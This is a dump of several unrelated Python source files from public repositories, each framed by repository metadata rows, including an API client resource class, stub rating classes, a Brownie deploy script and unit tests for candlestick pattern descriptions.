| 41.215686 | 150 | 0.580025 | 10,792 | 98,794 | 5.151964 | 0.037064 | 0.052806 | 0.066007 | 0.071493 | 0.905396 | 0.892878 | 0.885773 | 0.879802 | 0.874227 | 0.865665 | 0 | 0.01072 | 0.289005 | 98,794 | 2,396 | 151 | 41.232888 | 0.780829 | 0.104348 | 0 | 0.883801 | 0 | 0 | 0.225082 | 0.112176 | 0 | 0 | 0 | 0 | 0.164282 | 0 | null | null | 0.010303 | 0.012593 | null | null | 0.005724 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
3986b02adff5af069cb9cb2724853d5b7bdf642d | 3,740 | py | Python | lithic/_resource.py | lithic-com/lithic-python | be19d7195ebdf217b45f1ab59b39021d51330989 | ["Apache-2.0"] | null | null | null | lithic/_resource.py | lithic-com/lithic-python | be19d7195ebdf217b45f1ab59b39021d51330989 | ["Apache-2.0"] | null | null | null | lithic/_resource.py | lithic-com/lithic-python | be19d7195ebdf217b45f1ab59b39021d51330989 | ["Apache-2.0"] | null | null | null |
from typing import Type, Generic, List, TypeVar
from ._core import FinalRequestOptions, RequestOptions, Rsp, Req
from ._client import SyncAPIClient, AsyncAPIClient, SyncPage, Item, TPage, TAsyncPage
class SyncAPIResource:
_client: SyncAPIClient
def __init__(self, client: SyncAPIClient):
self._client = client
def get(self, path: str, *, query: Req = None, model: Type[Rsp], options: RequestOptions) -> Rsp:
opts = FinalRequestOptions(method="get", url=path, params=query, **options) # type: ignore[misc]
return self._client.request(model, opts)
def post(self, path: str, *, body: Req = None, model: Type[Rsp], options: RequestOptions) -> Rsp:
opts = FinalRequestOptions(method="post", url=path, json=body, **options) # type: ignore[misc]
return self._client.request(model, opts)
def patch(self, path: str, *, body: Req = None, model: Type[Rsp], options: RequestOptions) -> Rsp:
opts = FinalRequestOptions(method="patch", url=path, json=body, **options) # type: ignore[misc]
return self._client.request(model, opts)
def put(self, path: str, *, body: Req = None, model: Type[Rsp], options: RequestOptions) -> Rsp:
opts = FinalRequestOptions(method="put", url=path, json=body, **options) # type: ignore[misc]
return self._client.request(model, opts)
def delete(self, path: str, *, body: Req = None, model: Type[Rsp], options: RequestOptions) -> Rsp:
opts = FinalRequestOptions(method="delete", url=path, json=body, **options) # type: ignore[misc]
return self._client.request(model, opts)
def get_api_list(
self, path: str, *, query: Req = None, model: Type[Item], page: Type[TPage], options: RequestOptions
) -> TPage:
opts = FinalRequestOptions(method="get", url=path, params=query, **options) # type: ignore[misc]
return self._client.request_api_list(model, page, opts)
class AsyncAPIResource:
_client: AsyncAPIClient
def __init__(self, client: AsyncAPIClient):
self._client = client
async def get(self, path: str, *, query: Req = None, model: Type[Rsp], options: RequestOptions) -> Rsp:
opts = FinalRequestOptions(method="get", url=path, params=query, **options) # type: ignore[misc]
return await self._client.request(model, opts)
async def post(self, path: str, *, body: Req = None, model: Type[Rsp], options: RequestOptions) -> Rsp:
opts = FinalRequestOptions(method="post", url=path, json=body, **options) # type: ignore[misc]
return await self._client.request(model, opts)
async def patch(self, path: str, *, body: Req = None, model: Type[Rsp], options: RequestOptions) -> Rsp:
opts = FinalRequestOptions(method="patch", url=path, json=body, **options) # type: ignore[misc]
return await self._client.request(model, opts)
async def put(self, path: str, *, body: Req = None, model: Type[Rsp], options: RequestOptions) -> Rsp:
opts = FinalRequestOptions(method="put", url=path, json=body, **options) # type: ignore[misc]
return await self._client.request(model, opts)
async def delete(self, path: str, *, body: Req = None, model: Type[Rsp], options: RequestOptions) -> Rsp:
opts = FinalRequestOptions(method="delete", url=path, json=body, **options) # type: ignore[misc]
return await self._client.request(model, opts)
def get_api_list(
self, path: str, *, query: Req = None, model: Type[Item], page: Type[TAsyncPage], options: RequestOptions
) -> TAsyncPage:
opts = FinalRequestOptions(method="get", url=path, params=query, **options) # type: ignore[misc]
return self._client.request_api_list(model, page, opts)
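As a usage illustration (hypothetical, not part of this file): a concrete resource is expected to subclass SyncAPIResource and delegate to the verb helpers above. The Card model and the /cards/{id} endpoint below are placeholders only; a real model would be a type that SyncAPIClient.request() understands.

class Card:
    """Placeholder response model, for illustration only."""

class Cards(SyncAPIResource):
    def retrieve(self, card_id: str, *, options: RequestOptions) -> Card:
        # Delegates to the shared GET helper defined above.
        return self.get(f"/cards/{card_id}", model=Card, options=options)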
| 53.428571 | 113 | 0.669519 | 457 | 3,740 | 5.404814 | 0.109409 | 0.064777 | 0.053441 | 0.077733 | 0.833603 | 0.833603 | 0.833603 | 0.833603 | 0.833603 | 0.833603 | 0 | 0 | 0.191176 | 3,740 | 69 | 114 | 54.202899 | 0.816529 | 0.060695 | 0 | 0.54902 | 0 | 0 | 0.013714 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.176471 | false | 0 | 0.058824 | 0 | 0.54902 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 7 |
3988fb7b284a0cc8888d53c4363a81d13ea618c9 | 81 | py | Python | train/sample-cnn/sample_cnn/ops/__init__.py | devinplatt/ms_thesis | 5ed05023c9929d9f068a01b2b022785678215e18 | ["MIT"] | 49 | 2017-05-12T15:33:59.000Z | 2022-01-03T19:15:51.000Z | train/sample-cnn/sample_cnn/ops/__init__.py | devinplatt/ms-thesis | 5ed05023c9929d9f068a01b2b022785678215e18 | ["MIT"] | 5 | 2017-11-06T11:49:57.000Z | 2019-08-05T14:36:35.000Z | train/sample-cnn/sample_cnn/ops/__init__.py | devinplatt/ms-thesis | 5ed05023c9929d9f068a01b2b022785678215e18 | ["MIT"] | 13 | 2017-08-03T18:28:36.000Z | 2020-09-27T05:41:43.000Z |
from sample_cnn.ops.batch_inputs import *
from sample_cnn.ops.evaluation import *
| 40.5 | 41 | 0.839506 | 13 | 81 | 5 | 0.615385 | 0.307692 | 0.4 | 0.492308 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.08642 | 81 | 2 | 42 | 40.5 | 0.878378 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
39eff40e3dc9c8757b4a7ea8468df58d4eb237dc | 6,545 | py | Python | loldib/getratings/models/NA/na_soraka/na_soraka_top.py | koliupy/loldib | c9ab94deb07213cdc42b5a7c26467cdafaf81b7f | ["Apache-2.0"] | null | null | null | loldib/getratings/models/NA/na_soraka/na_soraka_top.py | koliupy/loldib | c9ab94deb07213cdc42b5a7c26467cdafaf81b7f | ["Apache-2.0"] | null | null | null | loldib/getratings/models/NA/na_soraka/na_soraka_top.py | koliupy/loldib | c9ab94deb07213cdc42b5a7c26467cdafaf81b7f | ["Apache-2.0"] | null | null | null |
from getratings.models.ratings import Ratings
class NA_Soraka_Top_Aatrox(Ratings):
pass
class NA_Soraka_Top_Ahri(Ratings):
pass
class NA_Soraka_Top_Akali(Ratings):
pass
class NA_Soraka_Top_Alistar(Ratings):
pass
class NA_Soraka_Top_Amumu(Ratings):
pass
class NA_Soraka_Top_Anivia(Ratings):
pass
class NA_Soraka_Top_Annie(Ratings):
pass
class NA_Soraka_Top_Ashe(Ratings):
pass
class NA_Soraka_Top_AurelionSol(Ratings):
pass
class NA_Soraka_Top_Azir(Ratings):
pass
class NA_Soraka_Top_Bard(Ratings):
pass
class NA_Soraka_Top_Blitzcrank(Ratings):
pass
class NA_Soraka_Top_Brand(Ratings):
pass
class NA_Soraka_Top_Braum(Ratings):
pass
class NA_Soraka_Top_Caitlyn(Ratings):
pass
class NA_Soraka_Top_Camille(Ratings):
pass
class NA_Soraka_Top_Cassiopeia(Ratings):
pass
class NA_Soraka_Top_Chogath(Ratings):
pass
class NA_Soraka_Top_Corki(Ratings):
pass
class NA_Soraka_Top_Darius(Ratings):
pass
class NA_Soraka_Top_Diana(Ratings):
pass
class NA_Soraka_Top_Draven(Ratings):
pass
class NA_Soraka_Top_DrMundo(Ratings):
pass
class NA_Soraka_Top_Ekko(Ratings):
pass
class NA_Soraka_Top_Elise(Ratings):
pass
class NA_Soraka_Top_Evelynn(Ratings):
pass
class NA_Soraka_Top_Ezreal(Ratings):
pass
class NA_Soraka_Top_Fiddlesticks(Ratings):
pass
class NA_Soraka_Top_Fiora(Ratings):
pass
class NA_Soraka_Top_Fizz(Ratings):
pass
class NA_Soraka_Top_Galio(Ratings):
pass
class NA_Soraka_Top_Gangplank(Ratings):
pass
class NA_Soraka_Top_Garen(Ratings):
pass
class NA_Soraka_Top_Gnar(Ratings):
pass
class NA_Soraka_Top_Gragas(Ratings):
pass
class NA_Soraka_Top_Graves(Ratings):
pass
class NA_Soraka_Top_Hecarim(Ratings):
pass
class NA_Soraka_Top_Heimerdinger(Ratings):
pass
class NA_Soraka_Top_Illaoi(Ratings):
pass
class NA_Soraka_Top_Irelia(Ratings):
pass
class NA_Soraka_Top_Ivern(Ratings):
pass
class NA_Soraka_Top_Janna(Ratings):
pass
class NA_Soraka_Top_JarvanIV(Ratings):
pass
class NA_Soraka_Top_Jax(Ratings):
pass
class NA_Soraka_Top_Jayce(Ratings):
pass
class NA_Soraka_Top_Jhin(Ratings):
pass
class NA_Soraka_Top_Jinx(Ratings):
pass
class NA_Soraka_Top_Kalista(Ratings):
pass
class NA_Soraka_Top_Karma(Ratings):
pass
class NA_Soraka_Top_Karthus(Ratings):
pass
class NA_Soraka_Top_Kassadin(Ratings):
pass
class NA_Soraka_Top_Katarina(Ratings):
pass
class NA_Soraka_Top_Kayle(Ratings):
pass
class NA_Soraka_Top_Kayn(Ratings):
pass
class NA_Soraka_Top_Kennen(Ratings):
pass
class NA_Soraka_Top_Khazix(Ratings):
pass
class NA_Soraka_Top_Kindred(Ratings):
pass
class NA_Soraka_Top_Kled(Ratings):
pass
class NA_Soraka_Top_KogMaw(Ratings):
pass
class NA_Soraka_Top_Leblanc(Ratings):
pass
class NA_Soraka_Top_LeeSin(Ratings):
pass
class NA_Soraka_Top_Leona(Ratings):
pass
class NA_Soraka_Top_Lissandra(Ratings):
pass
class NA_Soraka_Top_Lucian(Ratings):
pass
class NA_Soraka_Top_Lulu(Ratings):
pass
class NA_Soraka_Top_Lux(Ratings):
pass
class NA_Soraka_Top_Malphite(Ratings):
pass
class NA_Soraka_Top_Malzahar(Ratings):
pass
class NA_Soraka_Top_Maokai(Ratings):
pass
class NA_Soraka_Top_MasterYi(Ratings):
pass
class NA_Soraka_Top_MissFortune(Ratings):
pass
class NA_Soraka_Top_MonkeyKing(Ratings):
pass
class NA_Soraka_Top_Mordekaiser(Ratings):
pass
class NA_Soraka_Top_Morgana(Ratings):
pass
class NA_Soraka_Top_Nami(Ratings):
pass
class NA_Soraka_Top_Nasus(Ratings):
pass
class NA_Soraka_Top_Nautilus(Ratings):
pass
class NA_Soraka_Top_Nidalee(Ratings):
pass
class NA_Soraka_Top_Nocturne(Ratings):
pass
class NA_Soraka_Top_Nunu(Ratings):
pass
class NA_Soraka_Top_Olaf(Ratings):
pass
class NA_Soraka_Top_Orianna(Ratings):
pass
class NA_Soraka_Top_Ornn(Ratings):
pass
class NA_Soraka_Top_Pantheon(Ratings):
pass
class NA_Soraka_Top_Poppy(Ratings):
pass
class NA_Soraka_Top_Quinn(Ratings):
pass
class NA_Soraka_Top_Rakan(Ratings):
pass
class NA_Soraka_Top_Rammus(Ratings):
pass
class NA_Soraka_Top_RekSai(Ratings):
pass
class NA_Soraka_Top_Renekton(Ratings):
pass
class NA_Soraka_Top_Rengar(Ratings):
pass
class NA_Soraka_Top_Riven(Ratings):
pass
class NA_Soraka_Top_Rumble(Ratings):
pass
class NA_Soraka_Top_Ryze(Ratings):
pass
class NA_Soraka_Top_Sejuani(Ratings):
pass
class NA_Soraka_Top_Shaco(Ratings):
pass
class NA_Soraka_Top_Shen(Ratings):
pass
class NA_Soraka_Top_Shyvana(Ratings):
pass
class NA_Soraka_Top_Singed(Ratings):
pass
class NA_Soraka_Top_Sion(Ratings):
pass
class NA_Soraka_Top_Sivir(Ratings):
pass
class NA_Soraka_Top_Skarner(Ratings):
pass
class NA_Soraka_Top_Sona(Ratings):
pass
class NA_Soraka_Top_Soraka(Ratings):
pass
class NA_Soraka_Top_Swain(Ratings):
pass
class NA_Soraka_Top_Syndra(Ratings):
pass
class NA_Soraka_Top_TahmKench(Ratings):
pass
class NA_Soraka_Top_Taliyah(Ratings):
pass
class NA_Soraka_Top_Talon(Ratings):
pass
class NA_Soraka_Top_Taric(Ratings):
pass
class NA_Soraka_Top_Teemo(Ratings):
pass
class NA_Soraka_Top_Thresh(Ratings):
pass
class NA_Soraka_Top_Tristana(Ratings):
pass
class NA_Soraka_Top_Trundle(Ratings):
pass
class NA_Soraka_Top_Tryndamere(Ratings):
pass
class NA_Soraka_Top_TwistedFate(Ratings):
pass
class NA_Soraka_Top_Twitch(Ratings):
pass
class NA_Soraka_Top_Udyr(Ratings):
pass
class NA_Soraka_Top_Urgot(Ratings):
pass
class NA_Soraka_Top_Varus(Ratings):
pass
class NA_Soraka_Top_Vayne(Ratings):
pass
class NA_Soraka_Top_Veigar(Ratings):
pass
class NA_Soraka_Top_Velkoz(Ratings):
pass
class NA_Soraka_Top_Vi(Ratings):
pass
class NA_Soraka_Top_Viktor(Ratings):
pass
class NA_Soraka_Top_Vladimir(Ratings):
pass
class NA_Soraka_Top_Volibear(Ratings):
pass
class NA_Soraka_Top_Warwick(Ratings):
pass
class NA_Soraka_Top_Xayah(Ratings):
pass
class NA_Soraka_Top_Xerath(Ratings):
pass
class NA_Soraka_Top_XinZhao(Ratings):
pass
class NA_Soraka_Top_Yasuo(Ratings):
pass
class NA_Soraka_Top_Yorick(Ratings):
pass
class NA_Soraka_Top_Zac(Ratings):
pass
class NA_Soraka_Top_Zed(Ratings):
pass
class NA_Soraka_Top_Ziggs(Ratings):
pass
class NA_Soraka_Top_Zilean(Ratings):
pass
class NA_Soraka_Top_Zyra(Ratings):
pass
| 15.695444 | 46 | 0.766692 | 972 | 6,545 | 4.736626 | 0.151235 | 0.209818 | 0.389661 | 0.479583 | 0.803432 | 0.803432 | 0 | 0 | 0 | 0 | 0 | 0 | 0.169748 | 6,545 | 416 | 47 | 15.733173 | 0.847258 | 0 | 0 | 0.498195 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.498195 | 0.00361 | 0 | 0.501805 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 8 |
84440f80b63d812cde4c461405cc11db35baa517 | 146 | py | Python | library/python/coredump_filter/minidump2core/src/minidump2core/__init__.py | Microstrong0305/catboost | 66958d683748e91c19896b84c701b2e9142f9fb2 | ["Apache-2.0"] | 1 | 2021-11-04T07:13:15.000Z | 2021-11-04T07:13:15.000Z | library/python/coredump_filter/minidump2core/src/minidump2core/__init__.py | Microstrong0305/catboost | 66958d683748e91c19896b84c701b2e9142f9fb2 | ["Apache-2.0"] | null | null | null | library/python/coredump_filter/minidump2core/src/minidump2core/__init__.py | Microstrong0305/catboost | 66958d683748e91c19896b84c701b2e9142f9fb2 | ["Apache-2.0"] | null | null | null |
# -*- coding: utf-8 -*-
from minidump2core import print_minidump_as_core, minidump_file_to_core, minidump_text_to_core, minidump_text_to_threads
| 36.5 | 120 | 0.828767 | 22 | 146 | 4.954545 | 0.636364 | 0.330275 | 0.256881 | 0.330275 | 0.348624 | 0 | 0 | 0 | 0 | 0 | 0 | 0.015038 | 0.089041 | 146 | 3 | 121 | 48.666667 | 0.804511 | 0.143836 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 9 |
8460956fe61999cbb5e90b55b26fc4aa415e60c8 | 158 | py | Python | seventweets/utils.py | sbg/seventweets | a2733ff175e8be6e34f346a9a14f7f30ab24ea74 | ["Apache-2.0"] | 2 | 2017-06-12T11:00:38.000Z | 2018-06-21T07:54:38.000Z | seventweets/utils.py | sbg/seventweets | a2733ff175e8be6e34f346a9a14f7f30ab24ea74 | ["Apache-2.0"] | null | null | null | seventweets/utils.py | sbg/seventweets | a2733ff175e8be6e34f346a9a14f7f30ab24ea74 | ["Apache-2.0"] | null | null | null |
import os
import binascii
def generate_api_token():
"""
Generates a random API token (30 hex characters).
"""
return binascii.b2a_hex(os.urandom(15)).decode('ascii')
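# Example: hex-encoding 15 random bytes always yields a 30-character
# string, so
#   >>> token = generate_api_token()
#   >>> len(token)
#   30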
| 15.8 | 59 | 0.670886 | 20 | 158 | 5.15 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.023622 | 0.196203 | 158 | 9 | 60 | 17.555556 | 0.787402 | 0.14557 | 0 | 0 | 1 | 0 | 0.042017 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | true | 0 | 0.5 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
f27b14ce2bc6e7e3041986c02a463c33f7bf3e40 | 142 | py | Python | librespot/audio/format/__init__.py | JeffmeisterJ/librespot-python | 0e0e1db65aa40262bd13479b97f81ae8c29ae049 | ["Apache-2.0"] | 1 | 2021-12-15T22:44:46.000Z | 2021-12-15T22:44:46.000Z | librespot/audio/format/__init__.py | JeffmeisterJ/librespot-python | 0e0e1db65aa40262bd13479b97f81ae8c29ae049 | ["Apache-2.0"] | 12 | 2021-10-06T02:18:44.000Z | 2022-02-07T02:16:47.000Z | librespot/audio/format/__init__.py | JeffmeisterJ/librespot-python | 0e0e1db65aa40262bd13479b97f81ae8c29ae049 | ["Apache-2.0"] | null | null | null |
from librespot.audio.format.AudioQualityPicker import AudioQualityPicker
from librespot.audio.format.SuperAudioFormat import SuperAudioFormat
| 47.333333 | 72 | 0.901408 | 14 | 142 | 9.142857 | 0.5 | 0.203125 | 0.28125 | 0.375 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.056338 | 142 | 2 | 73 | 71 | 0.955224 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
f28fed9e56bc8741a7d32915a9213cf59d60d84d | 125 | py | Python | scripts/deploy_contracts.py | brownie-mix/metacoin-mix | f8433ffd569b7c8ee5b87319158e51b2e37a0da7 | ["MIT"] | null | null | null | scripts/deploy_contracts.py | brownie-mix/metacoin-mix | f8433ffd569b7c8ee5b87319158e51b2e37a0da7 | ["MIT"] | 1 | 2019-04-11T17:53:18.000Z | 2019-04-18T13:30:52.000Z | scripts/deploy_contracts.py | brownie-mix/metacoin-mix | f8433ffd569b7c8ee5b87319158e51b2e37a0da7 | ["MIT"] | 1 | 2019-07-11T21:28:45.000Z | 2019-07-11T21:28:45.000Z |
from brownie import *
def main():
ConvertLib.deploy({'from': accounts[0]})
MetaCoin.deploy({'from': accounts[0]})
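# A sketch of the usual invocation via the standard Brownie CLI (assuming
# a project whose contracts define ConvertLib and MetaCoin):
#   $ brownie run deploy_contracts
# `from brownie import *` is what injects `accounts` and the contract
# containers into this script's namespace when it is run that way.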
| 15.625 | 44 | 0.64 | 15 | 125 | 5.333333 | 0.666667 | 0.25 | 0.45 | 0.475 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.019231 | 0.168 | 125 | 7 | 45 | 17.857143 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0.064516 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | true | 0 | 0.25 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
f2c59923327624e91e67aa69d5ee31fd90554ebe | 8,492 | py | Python | tests/test_Data.py | nicoloridulfo/Formation-Finder | 45725c742436266739b5723858d8fe7a3ac39667 | ["MIT"] | null | null | null | tests/test_Data.py | nicoloridulfo/Formation-Finder | 45725c742436266739b5723858d8fe7a3ac39667 | ["MIT"] | null | null | null | tests/test_Data.py | nicoloridulfo/Formation-Finder | 45725c742436266739b5723858d8fe7a3ac39667 | ["MIT"] | 1 | 2019-08-14T12:43:37.000Z | 2019-08-14T12:43:37.000Z |
import numpy as np
import unittest
import pandas as pd
from io import StringIO
from FormationFinder.Data import *
StockCSV = """
Date,High,Low,Open,Close,Volume,Adj Close
2000-01-03,32.780799865722656,31.44930076599121,31.702899932861328,32.590599060058594,3285528.0,8.712677001953125
2000-01-04,32.27349853515625,31.06879997253418,32.27349853515625,31.132200241088867,7499032.0,8.322792053222656
2000-01-05,30.941999435424805,30.18120002746582,30.941999435424805,30.561599731445312,5184511.0,8.17025089263916
2000-01-06,13.638899803161621,13.638899803161621,13.638899803161621,40.91659927368164,0.0,10.93852710723877
2000-01-07,32.27349853515625,30.434799194335938,30.561599731445312,31.829700469970703,34270998.0,8.509261131286621
2000-01-10,33.35139846801758,31.576099395751953,31.576099395751953,32.590599060058594,11466146.0,8.712677001953125
2000-01-11,32.97100067138672,31.956499099731445,32.97100067138672,32.33689880371094,18261378.0,8.644850730895996
2000-01-12,32.65399932861328,31.702899932861328,31.829700469970703,32.21009826660156,6214946.0,8.610955238342285
2000-01-13,32.71739959716797,32.08330154418945,32.33689880371094,32.590599060058594,9968933.0,8.712677001953125
2000-01-14,32.97100067138672,31.89310073852539,32.71739959716797,32.71739959716797,9673455.0,8.746574401855469
2000-01-17,33.097801208496094,32.33689880371094,32.46379852294922,32.97100067138672,6870083.0,8.814370155334473
2000-01-18,33.16120147705078,32.71739959716797,33.22460174560547,32.97100067138672,6901902.0,8.814370155334473
2000-01-19,32.97100067138672,31.829700469970703,32.08330154418945,32.71739959716797,8467295.0,8.746574401855469
2000-01-20,32.844200134277344,31.702899932861328,31.702899932861328,32.33689880371094,9245403.0,8.644850730895996
2000-01-21,32.527198791503906,31.576099395751953,32.33689880371094,31.956499099731445,9230002.0,8.543159484863281
2000-01-24,32.08330154418945,31.06879997253418,32.08330154418945,31.19569969177246,5365394.0,8.339768409729004
2000-01-25,31.19569969177246,29.230100631713867,31.19569969177246,29.483699798583984,9641045.0,7.882087230682373
2000-01-26,31.06879997253418,29.61050033569336,29.80069923400879,30.434799194335938,12661921.0,8.1363525390625
2000-01-27,30.815200805664062,30.05430030822754,30.561599731445312,30.371400833129883,5863590.0,8.119404792785645
2000-01-28,30.941999435424805,29.16670036315918,30.941999435424805,29.483699798583984,4737557.0,7.882087230682373
"""
class DescriptionGenerationTest(unittest.TestCase):
def test_BullishEngulfing(self):
testData="""Open,High,Low,Close
6,7,3,4
2,9,1,8
0,0,0,16
""" #The last row of the data is to test the profit calculation
expectedResult = [-1, -1, -1, -1, 1, 1, 1, 1, -1, -1, -1, -1, 1, 1, 1, 1]
df: pd.DataFrame = pd.read_csv(StringIO(testData), sep=',', header=0)
desc, profits = generateDescription(df, 2, 1)
# Check that the lists are the same length
self.assertEqual(len(expectedResult), len(desc[0]))
# Check that the corresponding elements of the lists are equal
for i, (expected, actual) in enumerate(zip(expectedResult, desc[0])):
self.assertEqual(expected, actual, f"Elements at position {i} do not match: Expected {expected} and actual {actual}")
# Check that the profit 16 / 8 = 2
self.assertEqual(profits[0], 2)
def test_BearishHarami(self):
# For illustration, see images/BearishHarami.jpg
testData="""Open,High,Low,Close
7,8,1,2
4,12,3,11
9,10,5,6
0,0,0,12
"""
# Manually doing the description: 1 = higher, 0 = lower -> converted to 1 and -1 respectively
# expectedResult=[1010 1010 1010 1010
# 1111 1111 0011 0011
# 0011 1111 0011 1111]
expectedResult=[1,-1,1,-1,1,-1,1,-1,1,-1,1,-1,1,-1,1,-1,1,1,1,1,1,1,1,1,-1,-1,1,1,-1,-1,1,1,-1,-1,1,1,1,1,1,1,-1,-1,1,1,1,1,1,1]
df: pd.DataFrame = pd.read_csv(StringIO(testData), sep=',', header=0)
desc, profits = generateDescription(df, 3, 1)
# Check that the lists are the same length
self.assertEqual(len(expectedResult), len(desc[0]))
# Check that the corresponding elements of the lists are equal
for i, (expected, actual) in enumerate(zip(expectedResult, desc[0])):
self.assertEqual(expected, actual, f"Elements at position {i} do not match: Expected {expected} and actual {actual}")
# Check that the profit 12 / 6 = 2
self.assertEqual(profits[0], 2)
def test_GeneratedLength(self):
testData = """Date,High,Low,Open,Close,Volume,Adj Close
2000-01-03,32.780799865722656,31.44930076599121,31.702899932861328,32.590599060058594,3285528.0,8.712677001953125
2000-01-04,32.27349853515625,31.06879997253418,32.27349853515625,31.132200241088867,7499032.0,8.322792053222656
2000-01-05,30.941999435424805,30.18120002746582,30.941999435424805,30.561599731445312,5184511.0,8.17025089263916
2000-01-06,13.638899803161621,13.638899803161621,13.638899803161621,40.91659927368164,0.0,10.93852710723877
2000-01-07,32.27349853515625,30.434799194335938,30.561599731445312,31.829700469970703,34270998.0,8.509261131286621
2000-01-10,33.35139846801758,31.576099395751953,31.576099395751953,32.590599060058594,11466146.0,8.712677001953125
2000-01-11,32.97100067138672,31.956499099731445,32.97100067138672,32.33689880371094,18261378.0,8.644850730895996
2000-01-12,32.65399932861328,31.702899932861328,31.829700469970703,32.21009826660156,6214946.0,8.610955238342285
2000-01-13,32.71739959716797,32.08330154418945,32.33689880371094,32.590599060058594,9968933.0,8.712677001953125
2000-01-14,32.97100067138672,31.89310073852539,32.71739959716797,32.71739959716797,9673455.0,8.746574401855469
2000-01-17,33.097801208496094,32.33689880371094,32.46379852294922,32.97100067138672,6870083.0,8.814370155334473
2000-01-18,33.16120147705078,32.71739959716797,33.22460174560547,32.97100067138672,6901902.0,8.814370155334473
2000-01-19,32.97100067138672,31.829700469970703,32.08330154418945,32.71739959716797,8467295.0,8.746574401855469
2000-01-20,32.844200134277344,31.702899932861328,31.702899932861328,32.33689880371094,9245403.0,8.644850730895996
2000-01-21,32.527198791503906,31.576099395751953,32.33689880371094,31.956499099731445,9230002.0,8.543159484863281
2000-01-24,32.08330154418945,31.06879997253418,32.08330154418945,31.19569969177246,5365394.0,8.339768409729004
2000-01-25,31.19569969177246,29.230100631713867,31.19569969177246,29.483699798583984,9641045.0,7.882087230682373
2000-01-26,31.06879997253418,29.61050033569336,29.80069923400879,30.434799194335938,12661921.0,8.1363525390625
2000-01-27,30.815200805664062,30.05430030822754,30.561599731445312,30.371400833129883,5863590.0,8.119404792785645
2000-01-28,30.941999435424805,29.16670036315918,30.941999435424805,29.483699798583984,4737557.0,7.882087230682373
"""
df: pd.DataFrame = pd.read_csv(StringIO(testData), sep=',', header=0)
# Number of days = 20
# Given daysHold = 0:
# If daysBack = 2 -> removes the first day from the data. Describes and returns 19 rows.
# If daysBack = 3 -> removes the first two days from the data. Describes and returns 18 rows.
# Given daysHold = 1:
# If daysBack = 2 -> removes the first and last day from the data. Describes and returns 18 rows.
# If daysBack = 3 -> removes the first two and last one days from the data. Describes and returns 17 rows.
expected = {}
# Key = (daysBack, DaysHold)
# Value = number of rows
expected[(2, 0)] = 19
expected[(3, 0)] = 18
expected[(2, 1)] = 18
expected[(3, 1)] = 17
for daysBack, daysHold in expected:
desc, profits = generateDescription(df, daysBack, daysHold)
# Assert that the length is equal to the expected length
self.assertEqual(len(desc), expected[(daysBack, daysHold)])
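# Hedged addition (not in the original file): a conventional unittest entry
# point so the module can also be run directly as `python tests/test_Data.py`.
if __name__ == '__main__':
    unittest.main()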
| 67.936
| 137
| 0.707607
| 1105
| 8492
| 5.432579
| 0.195475
| 0.020656
| 0.029985
| 0.038647
| 0.8659
| 0.857904
| 0.849242
| 0.836915
| 0.803931
| 0.803931
| 0
| 0.586941
| 0.175813
| 8492
| 124
| 138
